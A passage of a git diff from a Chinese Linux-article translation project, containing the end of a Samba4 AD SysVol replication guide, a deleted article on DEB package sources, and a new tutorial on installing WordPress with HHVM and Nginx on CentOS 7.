notrap nomodify noquery mssntp +ntpsigndsocket /var/lib/samba/ntp_signd/ +``` + +4、最后,关闭并保存该配置文件,然后重启 NTP 服务以应用更改。等待几分钟后时间同步完成,执行 ntpq 命令来查看时间同步情况。 + +``` +# systemctl restart ntp +# ntpq -p +``` +[ + ![Synchronize NTP Time with Samba4 AD](http://www.tecmint.com/wp-content/uploads/2017/01/Synchronize-Time.png) +][8] + +与 Samba4 AD 同步 NTP 时间 + +### 第二步:通过 Rsync 命令来复制第一个 DC 服务器上的 SysVol 目录 + +默认情况下,Samba4 AD DC 不会通过 DFS-R(分布式文件系统复制)或者 FRS(文件复制服务)来复制 SysVol 目录。 + +这意味着只有在第一个域控制器联机时,组策略对象才可用。否则组策略设置和登录脚本不会应用到已加入域的 Windosws 机器上。 + +为了解决这个问题及实现 SysVol 目录的犁,我们通过执行一个[基于 SSH 的身份认证][10]并使用 SSH 加密通道的[Linux 同步命令][9]来从第一个域控制器安全地传输 GPO 对象到第二个域控制器。 + +这种方式能够确保 GPO 对象在域控制器之间的一致性,但是也有一个很大的缺点。它只能进行单向同步,因为在同步 GPO 目录的时候, rsync 命令会从源 DC 服务器传输所有的更改到目标 DC 服务器, + +源 DC 服务器上不存在的组策略对象也会从目标 DC 服务器上删除,为了限制并避免任何冲突,所有的 GPO 编辑操作只能在第一个 DC 服务器上执行。 + +5、要进行 SysVol 复制,先到[第一个 AD DC 服务器上生成 SSH 密钥][11],然后使用下面的命令把该密钥传输到第二个 DC 服务器。 + +在生成密钥的过程中不要设置密码,以便在无用户干预的情况下进行传输。 + +``` +# ssh-keygen -t RSA +# ssh-copy-id root@adc2 +# ssh adc2 +# exit +``` +[ + ![Generate SSH Key on Samba4 DC](http://www.tecmint.com/wp-content/uploads/2017/01/Generate-SSH-Key.png) +][12] + +在 Samba4 DC 服务器上生成 SSH 密钥 + +6、 当你确认 root 用户可以从第一个 DC 服务器以免密码方式登录到第二个 DC 服务器时,执行下面的 Rsync 命令,加上 `--dry-run` 参数来模拟 SysVol 复制过程。注意把对应的参数值替换成你自己的数据。 + +``` +# rsync --dry-run -XAavz --chmod=775 --delete-after --progress --stats /var/lib/samba/sysvol/ root@adc2:/var/lib/samba/sysvol/ +``` + +7、如果模拟复制过程正常,那么再次执行 rsync 命令,去掉 `--dry-run` 参数来真实的在域控制器之间复制 GPO 对象。 +``` +# rsync -XAavz --chmod=775 --delete-after --progress --stats /var/lib/samba/sysvol/ root@adc2:/var/lib/samba/sysvol/ +``` +[ + ![Samba4 AD DC SysVol Replication](http://www.tecmint.com/wp-content/uploads/2017/01/SysVol-Replication-for-Samba4-DC.png) +][13] + +Samba4 AD DC SysVol 复制 + +8、在 SysVol 复制完成之后,登录到目标域控制器,然后执行下面的命令来列出其中一个 GPO 对象目录的内容。 + +从第一个 DC 服务器上执行这个命令时,列出的 GPO 对象也要相同。 + +``` +# ls -alh /var/lib/samba/sysvol/your_domain/Policiers/ +``` +[ + ![Verify Samba4 DC SysVol Replication](http://www.tecmint.com/wp-content/uploads/2017/01/Verify-Samba4-DC-SysVol-Replication.png) +][14] + +验证 Samba4 DC SysVol 复制结果是否正常 + +9、为了自动完成组策略复制的过程(从网络来传输 sysvol 目录),你可以使用 root 账号设置一个任务来执行同步命令,如下所示,设置为每隔 5 分钟执行一次该命令。 + +``` +# crontab -e +``` + +添加一条每隔 5 分钟运行的同步命令,并把执行结果以及错误信息输出到日志文件 /var/log/sysvol-replication.log 。如果执行命令异常,你可以查看该文件来定位问题。 + +``` +*/5 * * * * rsync -XAavz --chmod=775 --delete-after --progress --stats /var/lib/samba/sysvol/ root@adc2:/var/lib/samba/sysvol/ > /var/log/sysvol-replication.log 2>&1 +``` + +10、如果以后 SysVol ACL 权限有问题,你可以通过下面的命令来检测和修复这些异常。 + +``` +# samba-tool ntacl sysvolcheck +# samba-tool ntacl sysvolreset +``` +[ + ![Fix SysVol ACL Permissions](http://www.tecmint.com/wp-content/uploads/2017/01/Fix-SysVol-ACL-Permissions.png) +][15] + +修复 SysVol ACL 权限问题 + +11、如果第一个 Samba4 AD DC 的 FSMO 角色,即“ PDC 模拟器”不可用,你可以强制 Microsoft Windows 系统上的组策略管理控制台只连接到第二个域控制器,通过选择更改域控制器选项和手动选择目标机器,如下图所示。 + +[ + ![Change Samba4 Domain Controller](http://www.tecmint.com/wp-content/uploads/2017/01/Change-Samba4-Domain-Controller.png) +][16] + +更改 Samba4 域控制器 + +[ + ![Select Samba4 Domain Controller](http://www.tecmint.com/wp-content/uploads/2017/01/Select-Samba4-Domain-Controller.png) +][17] + + +选择 Samba4 域控制器 + +当你从组策略管理控制台连接到第二个 DC 服务器时,你应该避免对组策略做任何更改。否则,当第一个 DC 服务器恢复正常后, rsync 命令将会删除在第二个 DC 服务器上所做的更改。 + +-------------------------------------------------------------------------------- + +作者简介: + +![](http://2.gravatar.com/avatar/be16e54026c7429d28490cce41b1e157?s=128&d=blank&r=g) + +我是一个电脑迷,开源软件和 Linux 系统爱好者,有超过 4 年的 Linux 桌面、服务器版本系统和 bash 编程经验。 + +-------------------------------------------------------------------------------- + +via: http://www.tecmint.com/samba4-ad-dc-sysvol-replication/ + +作者:[Matei Cezar][a] +译者:[rusking](https://github.com/rusking) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/cezarmatei/ +[1]:http://www.tecmint.com/join-additional-ubuntu-dc-to-samba4-ad-dc-failover-replication/ +[2]:http://www.tecmint.com/rsync-local-remote-file-synchronization-commands/ +[3]:http://www.tecmint.com/11-cron-scheduling-task-examples-in-linux/ +[4]:http://www.tecmint.com/5-best-practices-to-secure-and-protect-ssh-server/ +[5]:http://www.tecmint.com/install-and-configure-ntp-server-client-in-debian/ +[6]:http://www.tecmint.com/wp-content/uploads/2017/01/Configure-NTP-for-Samba4.png +[7]:http://www.tecmint.com/how-to-synchronize-time-with-ntp-server-in-ubuntu-linux-mint-xubuntu-debian/ +[8]:http://www.tecmint.com/wp-content/uploads/2017/01/Synchronize-Time.png +[9]:http://www.tecmint.com/rsync-local-remote-file-synchronization-commands/ +[10]:http://www.tecmint.com/ssh-passwordless-login-using-ssh-keygen-in-5-easy-steps/ +[11]:http://www.tecmint.com/ssh-passwordless-login-using-ssh-keygen-in-5-easy-steps/ +[12]:http://www.tecmint.com/wp-content/uploads/2017/01/Generate-SSH-Key.png +[13]:http://www.tecmint.com/wp-content/uploads/2017/01/SysVol-Replication-for-Samba4-DC.png +[14]:http://www.tecmint.com/wp-content/uploads/2017/01/Verify-Samba4-DC-SysVol-Replication.png +[15]:http://www.tecmint.com/wp-content/uploads/2017/01/Fix-SysVol-ACL-Permissions.png +[16]:http://www.tecmint.com/wp-content/uploads/2017/01/Change-Samba4-Domain-Controller.png +[17]:http://www.tecmint.com/wp-content/uploads/2017/01/Select-Samba4-Domain-Controller.png diff --git a/translated/tech/20170117 5 of the Best Places to Find DEBs Packages for Debian-Based Linux Distros.md b/translated/tech/20170117 5 of the Best Places to Find DEBs Packages for Debian-Based Linux Distros.md deleted file mode 100644 index 7fbee261dc..0000000000 --- a/translated/tech/20170117 5 of the Best Places to Find DEBs Packages for Debian-Based Linux Distros.md +++ /dev/null @@ -1,75 +0,0 @@ -5 个在基于 Debian 的 Linux 发行版上找到 deb 软件包的方法 -============================================================ - ![](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/deb-packages.jpg "5 of the Best Places to Find DEBs Packages for Debian-Based Linux Distross") - - -基于 Debian 的 Linux 发行版上有一个问题:为用户提供高级软件选择。当涉及到为 Linux 制作软件时,所有的大公司都首先瞄准这种类型的 Linux 发行版。通常一些开发人员甚至不打算为其他类型的 Linux 发行版做并且_只_做 DEB 包。 - -然而,只是因为许多开发人员针对这些类型的 Linux 发行版并不意味着用户从来没有遇到寻找软件的问题。大多数 Debian 和 Ubuntu 用户会自己在互联网上搜索 DEB 包。 - -因此,我们决定写一篇文章,它涵盖了五个最好的网站以找到基于 Debian 的 Linux 发行版的 DEB 软件包。 这样用户就能够更容易地找到他们需要的软件,而不是浪费时间在互联网上搜索。 - -### 1\. Launchpad - -[Launchpad][11]是互联网上最大的基于 Debian 的软件包仓库。 为什么? 这是 PPA 所在的地方!Canonical 创建了这个服务,所以任何开发商(大的或小的)都可以使用它,并且轻松地将其软件包分发给 Ubuntu 用户。 - -不幸的是,并不是所有基于 Debian 的 Linux 发行版都是 Ubuntu。但是,只是因为你的 Linux 发行版不使用 PPA 并不意味着此服务是无用的。Launchpad 使得很有可能直接下载任何 Debian 软件包进行安装。 - - ![debian-packages-launchpad](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/debian-packages-launchpad.jpg "debian-packages-launchpad") - -### 2\. Pkgs.org - -除了 Launchpad,[Pkgs.org][12]可能是互联网上查找 Debian 软件包的最大的地方。如果一个 Linux 用户需要一个 deb,并且不能在它的发布包的软件包仓库中找到它,它很可能在这个网站上找到。 - - ![debian-packages-pkgs-org](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/debian-packages-pkgs-org.jpg "debian-packages-pkgs-org") - -### 3\. Getdeb - -Getdeb][13] 是一个特定于 Ubuntu 的项目,它托管最新的 Ubuntu 版本的软件。这使它成为一个找 Debian 包很好的地方。特别是如果用户是在 Ubuntu、Linux Mint、Elementary OS和其他许多基于 Ubuntu 的 Linux 发行版上。此外,这些软件包甚至可以在 Debian 上工作! - - ![debian-packages-get-deb](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/debian-packages-get-deb.jpg "debian-packages-get-deb") - -### 4\. RPM Seek - -即使[这个网站][14]声称是 “Linux RPM 包搜索引擎”,奇怪的是,它也可以搜索 DEB 包。如果你试图找到一个特定的 DEB 包,并且在其他地方都找过了,再检查下 RPM Seek 或许是一个好主意,因为它可能有你所需要的。 - - ![debian-packages-rpm-seek](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/debian-packages-rpm-seek.jpg "debian-packages-rpm-seek") - -### 5\. Open Suse Software - -[Open SUSE 构建服务][15]是 Linux 上最知名的软件构建工具之一。有了它,开发人员可以轻松地获取他们的代码,并为许多不同的 Linux 发行版打包。因此,OSB 的包搜索允许用户下载 DEB 文件。 - -更有趣的是,许多开发人员选择使用 OSB 分发他们的软件,因为它可以轻松地生成 RPM、DEB等。如果用户急切需要 DEB,Open SUSE Build 的服务很值得去看下。 - - ![debian-packages-opensuse-build](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/debian-packages-opensuse-build.jpg "debian-packages-opensuse-build") - -### 总结 - -寻找 Linux 发行版的包可能是乏味的,有时令人沮丧。这就是为什么很高兴了解到有基于 Debian 的 Linux 发行版的用户可以访问获得他们需要的软件的网站。 - --------------------------------------------------------------------------------- - -via: https://www.maketecheasier.com/best-places-find-debs-packages/ - -作者:[Derrik Diener][a] -译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.maketecheasier.com/author/derrikdiener/ -[1]:https://www.maketecheasier.com/author/derrikdiener/ -[2]:https://www.maketecheasier.com/best-places-find-debs-packages/#comments -[3]:https://www.maketecheasier.com/category/linux-tips/ -[4]:http://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.maketecheasier.com%2Fbest-places-find-debs-packages%2F -[5]:http://twitter.com/share?url=https%3A%2F%2Fwww.maketecheasier.com%2Fbest-places-find-debs-packages%2F&text=5+of+the+Best+Places+to+Find+DEBs+Packages+for+Debian-Based+Linux+Distros -[6]:mailto:?subject=5%20of%20the%20Best%20Places%20to%20Find%20DEBs%20Packages%20for%20Debian-Based%20Linux%20Distros&body=https%3A%2F%2Fwww.maketecheasier.com%2Fbest-places-find-debs-packages%2F -[7]:https://www.maketecheasier.com/add-paypal-wordpress/ -[8]:https://www.maketecheasier.com/keep-kids-videos-out-youtube-history/ -[9]:https://support.google.com/adsense/troubleshooter/1631343 -[10]:https://www.maketecheasier.com/find-rpms-for-redhat-based-distros/ -[11]:https://launchpad.net/ -[12]:https://pkgs.org/ -[13]:http://www.getdeb.net/welcome/ -[14]:http://www.rpmseek.com/index.html -[15]:https://build.opensuse.org/ diff --git a/translated/tech/20170117 How to Install WordPress with HHVM and Nginx on CentOS 7.md b/translated/tech/20170117 How to Install WordPress with HHVM and Nginx on CentOS 7.md new file mode 100644 index 0000000000..039aba6a10 --- /dev/null +++ b/translated/tech/20170117 How to Install WordPress with HHVM and Nginx on CentOS 7.md @@ -0,0 +1,508 @@ +如何在 CentOS 7 中通过 HHVM 和 Nginx 安装 WordPress +======================== + +### 导航 + +1. [步骤 1 - 配置 SELinux 并添加v EPEL 仓库][1] +2. [步骤 2 - 安装 Nginx][2] +3. [步骤 3 - 安装并配置 MariaDB][3] +4. [步骤 4 - 安装 HHVM][4] +5. [步骤 5 - 配置 HHVM][5] +6. [步骤 6 - 配置 HHVM 和 Nginx][6] +7. [步骤 7 - 通过 HHVM 和 Nginx 创建虚拟主机][7] +8. [步骤 8 - 安装 WordPress][8] +9. [参考链接][9] + +HHVM (HipHop Virtual Machine) is an open source virtual machine for executing programs written in PHP and Hack language. HHVM has been developed by Facebook, it provides most features of the current PHP 7 version. To run HHVM on your server, you can use a FastCGI to connect HHVM with a Nginx or Apache web server, or you can use the web server built into HHVM called "Proxygen". + +In this tutorial, I will show you how to install WordPress with HHVM and Nginx as web server. I will use CentOS 7 as the operating system, so basic knowledge of CentOS is required. + +**先决条件** + +* CentOS 7 - 64位 +* Root 特权 + +### 步骤 1 - 配置 SELinux 并添加v EPEL 仓库 + +在本教程中,我们将以强制模式来运行 SELinux,所以我们需要在系统上安装一个 SELinux 管理工具。这里我们使用 setools 和 setrobleshoot 来管理 SELinux 的各项配置。 + +CentOS 7 已经默认启用 SELinux,我们可以通过以下命令来确认: + +``` +# sestatus +# getenforce +``` + +[![验证 SELinux 运行状态](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/1.png)][10] + +如图,你能够看到,SELinux 已经开启了强制模式。 + +接下来就是使用 yum 来安装 setools 和 setroubleshoot 了。 + +``` +# yum -y install setroubleshoot setools net-tools +``` + +安装好这两个后,在安装 EPEL 仓库。 + +``` +# yum -y install epel-release +``` + +### 步骤 2 - 安装 Nginx + +Nginx (发音:engine-x) 是一个高性能、低消耗的轻量级 Web 服务器软件。在 CentOS 中可以使用 yum 命令来安装 Nginx 包。记住用 root 用登录系统哦。 + +使用 yum 命令从 CentOS 仓库中安装 nginx。 + +``` +# yum -y install nginx +``` + +现在可以使用 systemctl 命令来启动 Nginx,同时将其设置为跟随系统启动。 + +``` +# systemctl start nginx +# systemctl enable nginx +``` + +为确保 Nginx 已经正确运行于服务器中,在浏览上输入服务器的 IP,或者如下使用 curl 命令检查显示结果。 + +``` +# curl 192.168.1.110 +``` + +我这里使用浏览器来验证。 + +[![Nginx 正确运行](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/2.png)][11] + +### 步骤 3 - 安装并配置 MariaDB + +MariaDB 是由原 MySQL 开发者 Monty Widenius 开发的一款开源数据库软件,它由 MySQL 分支而来,但与 MySQL 的主要用法保持一致。在这一步中,我们要安装 MariaDB 数据库并为之配置好 root 密码,然后在为 WordPress 安装的需要创建一个新的数据库和用户。 + +安装 mariadb 和 mariadb-server: + +``` +# yum -y install mariadb mariadb-server +``` + +启动 MariaDB 并添加为服务,以便随系统启动。 + +``` +# systemctl start mariadb +# systemctl enable mariadb +``` + +现在 MariaDB 已经启动了,还需要为 mariadb/mysql 数据库配置 root 用户密码。输入以下命令来设置 MariaDB root 密码。 + +``` +# mysql_secure_installation +``` + +提示设置 root 用户密码时,输入新密码进行设置: + +``` +Set root password? [Y/n] Y +New password: +Re-enter new password: + +Remove anonymous users? [Y/n] Y + ... Success! +Disallow root login remotely? [Y/n] Y + ... Success! +Remove test database and access to it? [Y/n] Y +Reload privilege tables now? [Y/n] Y + ... Success! +``` + +这样就设置好了 MariaDB 的 root 密码。现在登录到 MariaDB/MySQL shell 并为 WordPress 的安装创建一个新数据库 **"wordpressdb"** 和新用户 **"wpuser"**,密码设置为 **"wpuser@"**。在你的安装设置中要选用一个安全的密码。 + +登录到 MariaDB/MySQL shell: + +``` +# mysql -u root -p +``` + +接着输入你刚刚设置的 root 用户密码。 + +创建数据库和用户: + +``` +MariaDB [(none)]> create database wordpressdb; +MariaDB [(none)]> create user wpuser@localhost identified by 'wpuser@'; +MariaDB [(none)]> grant all privileges on wordpressdb.* to wpuser@localhost identified by 'wpuser@'; +MariaDB [(none)]> flush privileges; +MariaDB [(none)]> \q +``` + +[![为 WordPress 的安装创建数据库和用户](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/3.png)][12] + +现在安装好了 MariaDB,并为 WordPress 创建好了数据库。 + +### 步骤 4 - 安装 HHVM + +对于 HHVM,我们需要安装大量的依赖。作为选择,你可以从 GitHub 下载 HHVM 的源码来编译安装,也可以从网络上获取预编译的包进行安装。在本教程中,我使用的是预编译的安装包。 + +为 HHVM 安装依赖。 + +``` +# yum -y install cpp gcc-c++ cmake git psmisc {binutils,boost,jemalloc,numactl}-devel \ +> {ImageMagick,sqlite,tbb,bzip2,openldap,readline,elfutils-libelf,gmp,lz4,pcre}-devel \ +> lib{xslt,event,yaml,vpx,png,zip,icu,mcrypt,memcached,cap,dwarf}-devel \ +> {unixODBC,expat,mariadb}-devel lib{edit,curl,xml2,xslt}-devel \ +> glog-devel oniguruma-devel ocaml gperf enca libjpeg-turbo-devel openssl-devel \ +> mariadb mariadb-server libc-client make +``` + +然后是使用 rpm 安装从 [HHVM 预编译包镜像站点][13] 下载的 HHVM 预编译包。 + +``` +# rpm -Uvh http://mirrors.linuxeye.com/hhvm-repo/7/x86_64/hhvm-3.15.2-1.el7.centos.x86_64.rpm +# ln -s /usr/local/bin/hhvm /bin/hhvm +``` + +安装好 HHVM 之后使用如下命令按了验证: + +``` +# hhvm --version +``` + +为了能使用 PHP 命令,可以把 hhvm 命令设置为 php。这样在 shell 中输入 'php' 命令的时候,你会看到和输入 hhvm 命令一样的结果。 + +``` +# sudo update-alternatives --install /usr/bin/php php /usr/bin/hhvm 60 +# php --version +``` + +[![安装 HHVM](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/4.png)][14] + +### 步骤 5 - 配置 HHVM + +这一步中,我们来配置 HHVM 以系统服务器来运行。我们不通过端口这种常规的方式来运行它,而是选择使用 unix socket 文件的方式,这样运行的更快速一点。 + +进入 systemd 配置目录,并创建一个 hhvm.service 文件。 + +``` +# cd /etc/systemd/system/ +# vim hhvm.service +``` + +复制粘贴如下配置到文件中去。 + +``` +[Unit] +Description=HHVM HipHop Virtual Machine (FCGI) +After=network.target nginx.service mariadb.service + +[Service] +ExecStart=/usr/local/bin/hhvm --config /etc/hhvm/server.ini --user nginx --mode daemon -vServer.Type=fastcgi -vServer.FileSocket=/var/run/hhvm/hhvm.sock + +[Install] +WantedBy=multi-user.target +``` + +保存文件退出 vim。 + +接下来,进入 hhvm 目录并编辑 server.ini 文件。 + +``` +# cd /etc/hhvm/ +# vim server.ini +``` + +将第 7 行 hhvm.server.port 替换为 unix socket,如下: + +``` +hhvm.server.file_socket = /var/run/hhvm/hhvm.sock +``` + +保存文件并退出编辑器。 + +我们已在 hhvm 服务文件中定义了 hhvm 以 'nginx' 用户身份运行,所以还需要把 socket 文件目录的属主变更为 'nginx'。然后我们还必须在 SELinux 中修改 hhvm 目录内容以便让它可以访问这个 socket 文件。 + +``` +# chown -R nginx:nginx /var/run/hhvm/ +# semanage fcontext -a -t httpd_var_run_t "/var/run/hhvm(/.*)?" +# restorecon -Rv /var/run/hhvm +``` + +服务器重启之后,hhvm 将不能运行,因为没有存储 socket 文件的目录,所有还必须在启动的时候自动创建一个。 + +使用 vim 编辑 rc.local 文件。 + +``` +# vim /etc/rc.local +``` + +将以下配置粘贴到文件末行。 + +``` +# mkdir -p /var/run/hhvm/ +# chown -R nginx:nginx /var/run/hhvm/ +# semanage fcontext -a -t httpd_var_run_t "/var/run/hhvm(/.*)?" +# restorecon -Rv /var/run/hhvm +``` + +保存文件并退出 vim。然后给文件赋予执行权限。 + +``` +# chmod +x /etc/rc.local +``` + +重新加载 systemd 服务,启动 hhvm 并设置为随系统启动。 + +``` +# systemctl daemon-reload +# systemctl start hhvm +# systemctl enable hhvm +``` + +要确保无误,使用 netstat 命令验证 hhvm 运行于 socket 文件。 + +``` +# netstat -pl | grep hhvm +``` + +[![Check the HHVM socket file](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/5.png)][15] + +### 步骤 6 - 配置 HHVM 和 Nginx + +在这个步骤中,我们配置好 HHVM 已让它运行在 Nginx Web 服务中,这需要在 Nginx 目录创建一个 hhvm 的配置文件。 + +进入 /etc/nginx 目录,创建 a hhvm.conf 文件。 + +``` +# cd /etc/nginx/ +# vim hhvm.conf +``` + +粘贴一下内容到文件中。 + +``` +location ~ \.(hh|php)$ { +    root /usr/share/nginx/html; +    fastcgi_keep_conn on; +    fastcgi_pass unix:/var/run/hhvm/hhvm.sock; +    fastcgi_index  index.php; +    fastcgi_param  SCRIPT_FILENAME $document_root$fastcgi_script_name; +    include        fastcgi_params; +} +``` + +然后,保存并退出。 + +接下来,编辑 nginx.conf 文件,添加 hhvm 配置文件到 include 行。 + +``` +# vim nginx.conf +``` + +添加配置到第 57 行的 server 指令中。 + +``` +include /etc/nginx/hhvm.conf; +``` + +保存并退出。 + +然后修改 SELinux 中关于 hhvm 配置文件的内容。 + +``` +# semanage fcontext -a -t httpd_config_t /etc/nginx/hhvm.conf +# restorecon -v /etc/nginx/hhvm.conf +``` + +测试 Nginx 配置并重启服务。 + +``` +# nginx -t +# systemctl restart nginx +``` + +记住确保没有错误。 + +### 步骤 7 - 通过 HHVM 和 Nginx 创建虚拟主机 + +在这一步中能,我们要为 Nginx 和 hhvm 创建一个新的虚拟主机配置文件。这里我使用域名 **"natsume.co"** 来作为例子.你可以使用你主机喜欢的域名,并在配置文件中相应位置以及 WordPress 安装过程中进行替换。 + +进入 nginx conf.d 目录,我们将在该目录存储虚拟主机文件。 + +``` +# cd /etc/nginx/conf.d/ +``` + +使用 vim 创建一个名为 "natsume.conf" 的配置文件。 + +``` +# vim natsume.conf +``` +粘贴以下内容到虚拟主机配置文件中。 + +``` +server { + listen 80; + server_name natsume.co; + + # note that these lines are originally from the "location /" block + root /var/www/hakase; + index index.php index.html index.htm; + + location / { + try_files $uri $uri/ =404; + } + error_page 404 /404.html; + location = /50x.html { + root /var/www/hakase; + } + + location ~ \.php$ { + try_files $uri =404; + fastcgi_pass unix:/var/run/hhvm/hhvm.sock; + fastcgi_index index.php; + fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; + include fastcgi_params; + } +} +``` + +保存并退出。 + +在这给虚拟主机配置文件中,我们定义该域名的 Web 根目录为 "/var/www/hakase"。目前该目录还不存在,所有我们要创建它,并变更属主为 nginx 用户和组。 + +``` +# mkdir -p /var/www/hakase +# chown -R nginx:nginx /var/www/hakase +``` + + +Next, configure the SELinux context for the file and directory. + +``` +# semanage fcontext -a -t httpd_config_t "/etc/nginx/conf.d(/.*)?" +# restorecon -Rv /etc/nginx/conf.d +``` + +最后,测试 nginx 配置文件以确保没有错误后,重启 nginx: + +``` +# nginx -t +# systemctl restart nginx +``` + +### 步骤 8 - 安装 WordPress + +在步骤 5 的时候,我们已经为 WordPress 配置好了虚拟主机,现在只需要下载 WordPress 和使用我们在步骤 3 的时候创建的数据库和用户来编辑数据库配置就好了。 + +进入 Web 根目录 "/var/www/hakase" 并使用 Wget 命令下载 WordPress: + +``` +# cd /var/www/hakase +# wget wordpress.org/latest.tar.gz +``` + +解压 "latest.tar.gz" 并将 wordpress 文件夹中所有的文件和目录移动到当前目录: + +``` +# tar -xzvf latest.tar.gz +# mv wordpress/* . +``` + +下一步,复制一份 "wp-config-sample.php" 并更名为 "wp-config.php",然后使用 vim 进行编辑: + +``` +# cp wp-config-sample.php wp-config.php +# vim wp-config.php +``` + +将 DB_NAME 设置为 **"wordpressdb"**、DB_USER 设置为 **"wpuser"** 以及 DB_PASSWORD 设置为 **"wpuser@"**。 + +``` +define('DB_NAME', 'wordpressdb'); +define('DB_USER', 'wpuser'); +define('DB_PASSWORD', 'wpuser@'); +define('DB_HOST', 'localhost'); +``` + +保存并退出。 + +[![WordPress 配置](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/6.png)][16] + +修改关于 WordPress 目录的 SELinux 配置指令。 + +``` +# semanage fcontext -a -t httpd_sys_content_t "/var/www/hakase(/.*)?" +# restorecon -Rv /var/www/hakase +``` + +现在打开 Web 浏览器,在地址栏输入你之前为 WordPress 设置的域名,我这里是 "natsume.co"。 + +选择英语并点击 '继续 (Continue)'。 + +[![安装 Wordpress - 语言选择](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/7.png)][17] + +根据自身要求填写站点标题和描述并点击 "安装 Wordpress (Install Wordpress)"。 + +[![安装 Wordpress - 配置管理员账号和站点标题](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/8.png)][18] + +耐心等待安装完成。你会见到如下页面,点击 "登录 (Log In)" 来登录到管理面板。 + +[![安装 Wordpress - 成功安装](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/9.png)][19] + +输入你设置的管理员用户账号和密码,在此点击 "登录 (Log In)"。 + +[![登录到 wordpress 管理面板](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/10.png)][20] + +现在你已经登录到 WordPress 的管理面板了。 + +[![Wordpress 管理面](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/11.png)][21] + +Wordpress 主页。 + +[![Wordpress 默认主页](https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/12.png)][22] + +至此,我们已经在 CentOS 7 上通过 Nginx 和 HHVM 成功安装 Wordpress。 + +### 参考链接 + +- [https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-opensuse-leap-42-1/](https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-opensuse-leap-42-1/) +- [https://www.nginx.com/blog/nginx-se-linux-changes-upgrading-rhel-6-6/https://www.nginx.com/blog/nginx-se-linux-changes-upgrading-rhel-6-6/](https://www.nginx.com/blog/nginx-se-linux-changes-upgrading-rhel-6-6/) + +------------------------------------ + +译者简介: + +[GHLandy](http://GHLandy.com) —— 划不完粉腮柳眉泣别离。 + +------------------------------------ + +via: https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/ + +作者:[ Muhammad Arul][a] +译者:[GHLandy](https://github.com/GHLandy) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/ +[1]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/#step-configure-selinux-and-add-the-epel-repository +[2]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/#step-install-nginx +[3]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/#step-install-and-configure-mariadb +[4]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/#step-install-hhvm +[5]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/#step-configure-hhvm +[6]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/#step-configure-hhvm-and-nginx +[7]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/#step-create-a-virtual-host-with-hhvm-and-nginx +[8]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/#step-install-wordpress +[9]:https://www.howtoforge.com/tutorial/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/#reference +[10]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/1.png +[11]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/2.png +[12]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/3.png +[13]:http://mirrors.linuxeye.com/hhvm-repo/7/x86_64/ +[14]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/4.png +[15]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/5.png +[16]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/6.png +[17]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/7.png +[18]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/8.png +[19]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/9.png 